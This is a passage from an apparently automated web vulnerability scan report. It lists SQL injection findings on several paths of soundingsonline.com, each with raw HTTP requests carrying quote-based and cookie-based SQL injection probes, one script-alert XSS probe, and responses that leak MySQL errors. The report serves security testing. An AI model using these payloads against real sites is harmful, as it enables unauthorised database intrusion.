Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E&1'=1' AND c' at line 1</font>
...[SNIP]...

1.138. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /archives?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.139. http://www.soundingsonline.com/archives [s_lv_s cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The s_lv_s cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the s_lv_s cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit'%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

1.140. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.141. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/know-how?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/know-how?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.142. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-boats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-boats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.143. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-gear?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-gear?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.144. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-powerboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-powerboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.145. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-sailboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-sailboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.146. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/q-a-a?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/q-a-a?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:51 GMT
